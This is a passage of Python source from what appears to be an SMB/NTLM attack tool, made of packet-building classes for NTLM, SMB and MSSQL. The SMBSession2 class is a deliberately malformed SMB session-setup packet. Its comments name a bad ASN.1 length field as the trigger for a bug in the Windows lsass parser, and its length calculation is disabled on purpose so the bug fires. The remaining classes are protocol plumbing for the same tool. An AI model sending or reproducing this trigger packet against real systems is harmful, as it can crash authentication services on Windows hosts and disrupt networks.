self.fields["Av5Len"]
) + str(
self.fields["Av5Str"]
) + str(
self.fields["Av6"]
) + str(
self.fields["Av6Len"])
CalculateNameOffset = str(self.fields["Signature"]) + str(
self.fields["SignatureNull"]
) + str(self.fields["MessageType"]) + str(
self.fields["TargetNameLen"]
) + str(self.fields["TargetNameMaxLen"]) + str(
self.fields["TargetNameOffset"]) + str(
self.fields["NegoFlags"]) + str(
self.fields["ServerChallenge"]) + str(
self.fields["Reserved"]) + str(
self.fields["TargetInfoLen"]) + str(
self.fields["TargetInfoMaxLen"]) + str(
self.fields["TargetInfoOffset"]) + str(
self.fields["NTLMOsVersion"])
CalculateAvPairsOffset = CalculateNameOffset + str(
self.fields["TargetNameStr"])
CalculateAvPairsLen = str(self.fields["Av1"]) + str(
self.fields["Av1Len"]
) + str(self.fields["Av1Str"]) + str(self.fields["Av2"]) + str(
self.fields["Av2Len"]) + str(self.fields["Av2Str"]) + str(
self.fields["Av3"]) + str(self.fields["Av3Len"]) + str(
self.fields["Av3Str"]) + str(self.fields["Av4"]) + str(
self.fields["Av4Len"]) + str(
self.fields["Av4Str"]) + str(
self.fields["Av5"]) + str(
self.fields["Av5Len"]) + str(
self.fields["Av5Str"]) + str(
self.fields["Av6"]) + str(
self.fields["Av6Len"])
self.fields["Len"] = struct.pack(">h", len(CalculateCompletePacket))
self.fields["SSPIBuffLen"] = struct.pack("<i", len(CalculateSSPI))[:2]
# Target Name Offsets
self.fields["TargetNameOffset"] = struct.pack("<i",
len(CalculateNameOffset))
self.fields["TargetNameLen"] = struct.pack(
"<i", len(self.fields["TargetNameStr"]))[:2]
self.fields["TargetNameMaxLen"] = struct.pack(
"<i", len(self.fields["TargetNameStr"]))[:2]
#AvPairs Offsets
self.fields["TargetInfoOffset"] = struct.pack(
"<i", len(CalculateAvPairsOffset))
self.fields["TargetInfoLen"] = struct.pack(
"<i", len(CalculateAvPairsLen))[:2]
self.fields["TargetInfoMaxLen"] = struct.pack(
"<i", len(CalculateAvPairsLen))[:2]
#AvPairs StrLen
self.fields["Av1Len"] = struct.pack("<i",
len(str(
self.fields["Av1Str"])))[:2]
self.fields["Av2Len"] = struct.pack("<i",
len(str(
self.fields["Av2Str"])))[:2]
self.fields["Av3Len"] = struct.pack("<i",
len(str(
self.fields["Av3Str"])))[:2]
self.fields["Av4Len"] = struct.pack("<i",
len(str(
self.fields["Av4Str"])))[:2]
self.fields["Av5Len"] = struct.pack("<i",
len(str(
self.fields["Av5Str"])))[:2]
class SMBSession2(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved", "\x00"),
("andxoffset", "\xfa\x00"),
("maxbuff", "\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum", "\x01\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength", "\x59\x00"),
("reserved2", "\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1", "\xbf\x00"),
("ApplicationHeaderTag", "\xa1"),
(
"ApplicationHeaderTagLenOfLen", "\x84"
), #//BUG --> Trigger is this specific ASN "\x84" (unsigned int) definition. Since len of sec blob is <255 the correct value should be \x81.
(
"ApplicationHeaderLen", "\xf6"
), #//BUG --> should be \xd1, lsass ASN parser is reading \xf6 + the next 3 chars (\x30\x81\xce) as len.
("AsnSecMechType", "\x30"),
("AsnSecMechLenOfLen", "\x81"),
("AsnSecMechLen", "\xce"),
("ChoosedTag", "\xa2"),
("ChoosedTagLenOfLen", "\x81"), #
("ChoosedTagLen", "\xcb"),
("ChoosedTag1", "\x04"),
("ChoosedTag1StrLenOfLen", "\x81"),
("ChoosedTag1StrLen", "\xc8"), #
#### NTLM Offset starts here... ####
("NLMPAuthMsgSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NLMPAuthMsgMessageType", "\x03\x00\x00\x00"),
("NLMPAuthMsgLMChallengeLen", "\x18\x00"),
("NLMPAuthMsgLMChallengeMaxLen", "\x18\x00"),
("NLMPAuthMsgLMChallengeBuffOffset", "\x88\x00\x00\x00"),
("NLMPAuthMsgNtChallengeResponseLen", "\x08\x00"),
("NLMPAuthMsgNtChallengeResponseMaxLen", "\x08\x00"),
("NLMPAuthMsgNtChallengeResponseBuffOffset", "\xa0\x00\x00\x00"),
("NLMPAuthMsgNtDomainNameLen", "\x08\x00"),
("NLMPAuthMsgNtDomainNameMaxLen", "\x08\x00"),
("NLMPAuthMsgNtDomainNameBuffOffset", "\x48\x00\x00\x00"),
("NLMPAuthMsgNtUserNameLen", "\x1a\x00"),
("NLMPAuthMsgNtUserNameMaxLen", "\x1a\x00"),
("NLMPAuthMsgNtUserNameBuffOffset", "\x50\x00\x00\x00"),
("NLMPAuthMsgNtWorkstationLen", "\x1e\x00"),
("NLMPAuthMsgNtWorkstationMaxLen", "\x1e\x00"),
("NLMPAuthMsgNtWorkstationBuffOffset", "\x6a\x00\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageLen", "\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageMaxLen", "\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageBuffOffset", "\x69\x00\x00\x00"),
("NLMPAuthMsgNtNegotiateFlags", "\x05\x8A\x88\xa2"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NLMPAuthMsgNtDomainName", "SMB1"),
("NLMPAuthMsgNtUserName", "LGANDX"),
("NLMPAuthMsgNtWorkstationName", "LGANDX"),
("NLMPAuthLMChallengeStr",
"\x06\xd7\x34\x6c\x40\x32\xe2\x97\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
),
("NLMPAuthMsgNTLMV1ChallengeResponseStruct",
"\xa8\x8c\xd8\x6c\x0e\x22\x08\x16\xb0\xf9\xc9\x64\x28\x74\x80\x05\x27\xc5\xc7\xf7\xc5\x88\xee\xdc"
),
("NLMPAuthMsgNSessionKey",
"\xd8\xb3\x3a\x17\x94\xf7\x6d\xad\x5f\xd4\xc7\x91\xcb\x14\xbd\x4e"),
("NLMPAuthMsgNull", "\x00"),
("nativeOs", "Windows 2002 Service Pack 3 2600"),
("nativeOsterminator", "\x00\x00"),
("ExtraNull", "\x00\x00"),
("nativelan", "Windows 2002 5.1"),
("nativelanterminator", "\x00\x00\x00\x00"),
("AndxPadding", "\x00\x00"),
])
def calculate(self):
##Convert strings to Unicode before any Len calc.
self.fields["NLMPAuthMsgNtUserName"] = self.fields[
"NLMPAuthMsgNtUserName"].encode('utf-16le')
self.fields["NLMPAuthMsgNtDomainName"] = self.fields[
"NLMPAuthMsgNtDomainName"].encode('utf-16le')
self.fields["NLMPAuthMsgNtWorkstationName"] = self.fields[
"NLMPAuthMsgNtWorkstationName"].encode('utf-16le')
self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le')
self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le')
CompletePacketLen = str(self.fields["wordcount"]) + str(
self.fields["AndXCommand"]) + str(self.fields["reserved"]) + str(
self.fields["andxoffset"]
) + str(self.fields["maxbuff"]) + str(self.fields["maxmpx"]) + str(
self.fields["vcnum"]
) + str(self.fields["sessionkey"]) + str(self.fields[
"securitybloblength"]) + str(self.fields["reserved2"]) + str(
self.fields["capabilities"]
) + str(
self.fields["bcc1"]
) + str(
self.fields["ApplicationHeaderTag"]
) + str(
self.fields["ApplicationHeaderTagLenOfLen"]
) + str(
self.fields["ApplicationHeaderLen"]
) + str(
self.fields["AsnSecMechType"]
) + str(
self.fields["AsnSecMechLenOfLen"]
) + str(
self.fields["AsnSecMechLen"]
) + str(
self.fields["ChoosedTag"]
) + str(
self.fields["ChoosedTagLenOfLen"]
) + str(
self.fields["ChoosedTagLen"]
) + str(
self.fields["ChoosedTag1"]
) + str(
self.fields["ChoosedTag1StrLenOfLen"]
) + str(
self.fields["ChoosedTag1StrLen"]
) + str(
self.fields["NLMPAuthMsgSignature"]
) + str(
self.fields["NLMPAuthMsgMessageType"]
) + str(
self.fields["NLMPAuthMsgLMChallengeLen"]
) + str(
self.fields["NLMPAuthMsgLMChallengeMaxLen"]
) + str(
self.fields["NLMPAuthMsgLMChallengeBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseLen"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameLen"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtUserNameLen"]
) + str(
self.fields["NLMPAuthMsgNtUserNameMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtUserNameBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"]
) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(self.fields["NLMPAuthMsgNtDomainName"]) + str(
self.fields["NLMPAuthMsgNtUserName"]) + str(
self.fields["NLMPAuthMsgNtWorkstationName"]
) + str(
self.fields["NLMPAuthLMChallengeStr"]
) + str(
self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"]
) + str(self.fields["NLMPAuthMsgNSessionKey"]) + str(
self.fields["NLMPAuthMsgNull"]) + str(
self.fields["nativeOs"]) + str(
self.fields["nativeOsterminator"]) + str(
self.fields["ExtraNull"]) + str(
self.fields["nativelan"]) + str(
self.fields["nativelanterminator"])
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"]) + str(
self.fields["ApplicationHeaderTagLenOfLen"]
) + str(self.fields["ApplicationHeaderLen"]) + str(
self.fields["AsnSecMechType"]
) + str(self.fields["AsnSecMechLenOfLen"]) + str(
self.fields["AsnSecMechLen"]
) + str(self.fields["ChoosedTag"]) + str(self.fields[
"ChoosedTagLenOfLen"]) + str(self.fields["ChoosedTagLen"]) + str(
self.fields["ChoosedTag1"]
) + str(
self.fields["ChoosedTag1StrLenOfLen"]
) + str(
self.fields["ChoosedTag1StrLen"]
) + str(
self.fields["NLMPAuthMsgSignature"]
) + str(
self.fields["NLMPAuthMsgMessageType"]
) + str(
self.fields["NLMPAuthMsgLMChallengeLen"]
) + str(
self.fields["NLMPAuthMsgLMChallengeMaxLen"]
) + str(
self.fields["NLMPAuthMsgLMChallengeBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseLen"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameLen"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtUserNameLen"]
) + str(
self.fields["NLMPAuthMsgNtUserNameMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtUserNameBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"]
) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(self.fields["NLMPAuthMsgNtDomainName"]) + str(
self.fields["NLMPAuthMsgNtUserName"]) + str(
self.fields["NLMPAuthMsgNtWorkstationName"]) + str(
self.fields["NLMPAuthLMChallengeStr"]
) + str(self.fields[
"NLMPAuthMsgNTLMV1ChallengeResponseStruct"]) + str(
self.fields["NLMPAuthMsgNSessionKey"])
CalculateOffsets = str(self.fields["NLMPAuthMsgSignature"]) + str(
self.fields["NLMPAuthMsgMessageType"]
) + str(self.fields["NLMPAuthMsgLMChallengeLen"]) + str(
self.fields["NLMPAuthMsgLMChallengeMaxLen"]
) + str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"]) + str(
self.fields["NLMPAuthMsgNtChallengeResponseLen"]
) + str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"]) + str(
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"]
) + str(self.fields["NLMPAuthMsgNtDomainNameLen"]) + str(
self.fields["NLMPAuthMsgNtDomainNameMaxLen"]
) + str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"]) + str(
self.fields["NLMPAuthMsgNtUserNameLen"]) + str(
self.fields["NLMPAuthMsgNtUserNameMaxLen"]) + str(
self.fields["NLMPAuthMsgNtUserNameBuffOffset"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationMaxLen"]
) + str(
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"]
) + str(
self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"]
) + str(self.fields["NLMPAuthMsgNtNegotiateFlags"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
CalculateUserOffset = CalculateOffsets + str(
self.fields["NLMPAuthMsgNtDomainName"])
CalculateDomainOffset = CalculateOffsets
CalculateWorkstationOffset = CalculateUserOffset + str(
self.fields["NLMPAuthMsgNtUserName"])
CalculateLMChallengeOffset = CalculateWorkstationOffset + str(
self.fields["NLMPAuthMsgNtWorkstationName"])
CalculateNTChallengeOffset = CalculateLMChallengeOffset + str(
self.fields["NLMPAuthLMChallengeStr"])
CalculateSessionOffset = CalculateNTChallengeOffset + str(
self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
## Packet len
self.fields["andxoffset"] = struct.pack("<h",
len(CompletePacketLen) + 32)
##Buff Len
self.fields["securitybloblength"] = struct.pack(
"<h", len(SecurityBlobLen))
##Complete Buff Len
self.fields["bcc1"] = struct.pack("<h", len(CompletePacketLen) - 27)
###### ASN Stuff
if len(SecurityBlobLen) > 255:
#self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" --> //BUG not using this calc since it's our trigger.
#self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-4) #-4 from secbloblen
pass #Not calculating this one to trigger the bug.
else:
#self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" --> //BUG not using this calc since it's our trigger.
#self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
pass #Not calculating this one to trigger the bug.
if len(SecurityBlobLen) - 8 > 255:
self.fields["AsnSecMechLenOfLen"] = "\x82"
self.fields["AsnSecMechLen"] = struct.pack(">H",
len(SecurityBlobLen) -
8) #-8 from secbloblen
else:
self.fields["AsnSecMechLenOfLen"] = "\x81"
self.fields["AsnSecMechLen"] = struct.pack(
">B",
len(SecurityBlobLen) - 6)
if len(SecurityBlobLen) - 12 > 255:
self.fields["ChoosedTagLenOfLen"] = "\x82"
self.fields["ChoosedTagLen"] = struct.pack(
">H",
len(SecurityBlobLen) - 12) #-12 from secbloblen
else:
self.fields["ChoosedTagLenOfLen"] = "\x81"
self.fields["ChoosedTagLen"] = struct.pack(
">B",
len(SecurityBlobLen) - 9)
if len(SecurityBlobLen) - 16 > 255:
self.fields["ChoosedTag1StrLenOfLen"] = "\x82"
self.fields["ChoosedTag1StrLen"] = struct.pack(
">H",
len(SecurityBlobLen) - 16) #-16 from secbloblen
else:
self.fields["ChoosedTag1StrLenOfLen"] = "\x81"
self.fields["ChoosedTag1StrLen"] = struct.pack(
">B",
len(SecurityBlobLen) - 12)
##### Username Offset Calculation..######
self.fields["NLMPAuthMsgNtUserNameBuffOffset"] = struct.pack(
"<i", len(CalculateUserOffset))
self.fields["NLMPAuthMsgNtUserNameLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtUserName"])))
self.fields["NLMPAuthMsgNtUserNameMaxLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtUserName"])))
##### Domain Offset Calculation..######
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] = struct.pack(
"<i", len(CalculateDomainOffset))
self.fields["NLMPAuthMsgNtDomainNameLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtDomainName"])))
self.fields["NLMPAuthMsgNtDomainNameMaxLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtDomainName"])))
##### Workstation Offset Calculation..######
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] = struct.pack(
"<i", len(CalculateWorkstationOffset))
self.fields["NLMPAuthMsgNtWorkstationLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))
self.fields["NLMPAuthMsgNtWorkstationMaxLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))
##### NT Challenge Offset Calculation..######
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] = struct.pack(
"<i", len(CalculateNTChallengeOffset))
self.fields["NLMPAuthMsgNtChallengeResponseLen"] = struct.pack(
"<h",
len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] = struct.pack(
"<h",
len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))
##### LM Challenge Offset Calculation..######
self.fields["NLMPAuthMsgLMChallengeBuffOffset"] = struct.pack(
"<i", len(CalculateLMChallengeOffset))
self.fields["NLMPAuthMsgLMChallengeLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthLMChallengeStr"])))
self.fields["NLMPAuthMsgLMChallengeMaxLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthLMChallengeStr"])))
##### SessionKey Offset Calculation..######
self.fields[
"NLMPAuthMsgRandomSessionKeyMessageBuffOffset"] = struct.pack(
"<i", len(CalculateSessionOffset))
self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNSessionKey"])))
self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"] = struct.pack(
"<h", len(str(self.fields["NLMPAuthMsgNSessionKey"])))
class MSSQLPreLoginAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\x25"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\x00"),
("VersionOffset", "\x00\x15"),
("VersionLen", "\x00\x06"),
("TokenType1", "\x01"),
("EncryptionOffset", "\x00\x1b"),
("EncryptionLen", "\x00\x01"),
("TokenType2", "\x02"),
("InstOptOffset", "\x00\x1c"),
("InstOptLen", "\x00\x01"),
("TokenTypeThrdID", "\x03"),
("ThrdIDOffset", "\x00\x1d"),
("ThrdIDLen", "\x00\x00"),
("ThrdIDTerminator", "\xff"),
("VersionStr", "\x09\x00\x0f\xc3"),
("SubBuild", "\x00\x00"),
("EncryptionStr", "\x02"),
("InstOptStr", "\x00"),
])
def calculate(self):
CalculateCompletePacket = str(self.fields["PacketType"]) + str(
self.fields["Status"]
) + str(self.fields["Len"]) + str(self.fields["SPID"]) + str(
self.fields["PacketID"]
) + str(self.fields["Window"]) + str(self.fields["TokenType"]) + str(
self.fields["VersionOffset"]) + str(
self.fields["VersionLen"]) + str(
self.fields["TokenType1"]) + str(
self.fields["EncryptionOffset"]) + str(
self.fields["EncryptionLen"]) + str(
self.fields["TokenType2"]) + str(
self.fields["InstOptOffset"]) + str(
self.fields["InstOptLen"]) + str(
self.fields["TokenTypeThrdID"]
) + str(
self.fields["ThrdIDOffset"]) + str(
self.fields["ThrdIDLen"]
) + str(
self.fields["ThrdIDTerminator"]
) + str(
self.fields["VersionStr"]
) + str(
self.fields["SubBuild"]
) + str(
self.fields["EncryptionStr"]
) + str(self.fields["InstOptStr"])
VersionOffset = str(self.fields["TokenType"]) + str(
self.fields["VersionOffset"]
) + str(self.fields["VersionLen"]) + str(
self.fields["TokenType1"]
) + str(self.fields["EncryptionOffset"]) + str(
self.fields["EncryptionLen"]) + str(
self.fields["TokenType2"]) + str(
self.fields["InstOptOffset"]) + str(
self.fields["InstOptLen"]) + str(
self.fields["TokenTypeThrdID"]) + str(
self.fields["ThrdIDOffset"]) + str(
self.fields["ThrdIDLen"]) + str(
self.fields["ThrdIDTerminator"])
EncryptionOffset = VersionOffset + str(
self.fields["VersionStr"]) + str(self.fields["SubBuild"])
InstOpOffset = EncryptionOffset + str(self.fields["EncryptionStr"])
ThrdIDOffset = InstOpOffset + str(self.fields["InstOptStr"])
self.fields["Len"] = struct.pack(">h", len(CalculateCompletePacket))
#Version
self.fields["VersionLen"] = struct.pack(
">h", len(self.fields["VersionStr"] + self.fields["SubBuild"]))
self.fields["VersionOffset"] = struct.pack(">h", len(VersionOffset))
#Encryption
self.fields["EncryptionLen"] = struct.pack(
">h", len(self.fields["EncryptionStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h",
len(EncryptionOffset))
#InstOpt
self.fields["InstOptLen"] = struct.pack(">h",
len(self.fields["InstOptStr"]))
self.fields["EncryptionOffset"] = struct.pack(">h", len(InstOpOffset))
#ThrdIDOffset
self.fields["ThrdIDOffset"] = struct.pack(">h", len(ThrdIDOffset))
class SMBNegoData(Packet):
fields = OrderedDict([
("Data", ""),
("separator", "\x02"),
("dialect", "NT LM 0.12\x00"),
])
class SMBNego(Packet):
fields = OrderedDict([("Wordcount", "\x00"), ("Bcc", "\x62\x00"),
("Data", "")])
def calculate(self):
self.fields["Bcc"] = struct.pack("<h", len(str(self.fields["Data"])))
class SMBSessionData(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved", "\x00"),
("andxoffset", "\xec\x00"),
("maxbuff", "\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum", "\x00\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength", "\x4a\x00"),
("reserved2", "\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1", "\xb1\x00"),
#msg ntlm exchange nego.
("ApplicationHeaderTag", "\x60"),
("ApplicationHeaderLen", "\x48"),
("AsnSecMechType", "\x06"),
("AsnSecMechLen", "\x06"),
("AsnSecMechStr", "\x2b\x06\x01\x05\x05\x02"),
("ChoosedTag", "\xa0"),
("ChoosedTagStrLen", "\x3e"),
("NegTokenInitSeqHeadTag", "\x30"),
("NegTokenInitSeqHeadLen", "\x3c"),
("NegTokenInitSeqHeadTag1", "\xA0"),
("NegTokenInitSeqHeadLen1", "\x0e"),
("NegTokenInitSeqNLMPTag", "\x30"),
("NegTokenInitSeqNLMPLen", "\x0c"),
("NegTokenInitSeqNLMPTag1", "\x06"),
("NegTokenInitSeqNLMPTag1Len", "\x0a"),
("NegTokenInitSeqNLMPTag1Str",
"\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenInitSeqNLMPTag2", "\xa2"),
("NegTokenInitSeqNLMPTag2Len", "\x2a"),
("NegTokenInitSeqNLMPTag2Octet", "\x04"),
("NegTokenInitSeqNLMPTag2OctetLen", "\x28"),
("NegTokenInitSeqMechSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NegTokenInitSeqMechMessageType", "\x01\x00\x00\x00"),
("NegTokenInitSeqMechMessageFlags", "\x07\x82\x08\xa2"),
("NegTokenInitSeqMechMessageDomainNameLen", "\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameMaxLen", "\x00\x00"),
("NegTokenInitSeqMechMessageDomainNameBuffOffset", "\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameLen", "\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameMaxLen", "\x00\x00"),
("NegTokenInitSeqMechMessageWorkstationNameBuffOffset",
"\x00\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x01"),
("NegTokenInitSeqMechMessageVersionBuilt", "\x28\x0a"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NegTokenInitSeqMechMessageVersionTerminator", "\x00"),
("nativeOs", "Windows 2002 Service Pack 3 2600"),
("nativeOsterminator", "\x00\x00"),
("nativelan", "Windows 2002 5.1"),
("nativelanterminator", "\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le')
self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le')
CompleteSMBPacketLen = str(self.fields["wordcount"]) + str(
self.fields["AndXCommand"]) + str(self.fields["reserved"]) + str(
self.fields["andxoffset"]
) + str(self.fields["maxbuff"]) + str(self.fields["maxmpx"]) + str(
self.fields["vcnum"]
) + str(self.fields["sessionkey"]) + str(self.fields[
"securitybloblength"]) + str(self.fields["reserved2"]) + str(
self.fields["capabilities"]
) + str(
self.fields["bcc1"]
) + str(
self.fields["ApplicationHeaderTag"]
) + str(
self.fields["ApplicationHeaderLen"]
) + str(
self.fields["AsnSecMechType"]
) + str(
self.fields["AsnSecMechLen"]
) + str(
self.fields["AsnSecMechStr"]
) + str(
self.fields["ChoosedTag"]
) + str(
self.fields["ChoosedTagStrLen"]
) + str(
self.fields["NegTokenInitSeqHeadTag"]
) + str(
self.fields["NegTokenInitSeqHeadLen"]
) + str(
self.fields["NegTokenInitSeqHeadTag1"]
) + str(
self.fields["NegTokenInitSeqHeadLen1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag"]
) + str(
self.fields["NegTokenInitSeqNLMPLen"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Str"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Octet"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(
self.fields["NegTokenInitSeqMechSignature"]
) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(
self.fields["NegTokenInitSeqMechMessageFlags"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.
fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.
fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields[
"NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionTerminator"]
) + str(self.fields["nativeOs"]) + str(
self.fields["nativeOsterminator"]) + str(
self.fields["nativelan"]) + str(
self.fields["nativelanterminator"])
SecBlobLen = str(self.fields["ApplicationHeaderTag"]) + str(
self.fields["ApplicationHeaderLen"]
) + str(self.fields["AsnSecMechType"]) + str(
self.fields["AsnSecMechLen"]
) + str(self.fields["AsnSecMechStr"]) + str(
self.fields["ChoosedTag"]
) + str(self.fields["ChoosedTagStrLen"]) + str(
self.fields["NegTokenInitSeqHeadTag"]
) + str(
self.fields["NegTokenInitSeqHeadLen"]
) + str(
self.fields["NegTokenInitSeqHeadTag1"]
) + str(
self.fields["NegTokenInitSeqHeadLen1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag"]
) + str(
self.fields["NegTokenInitSeqNLMPLen"]
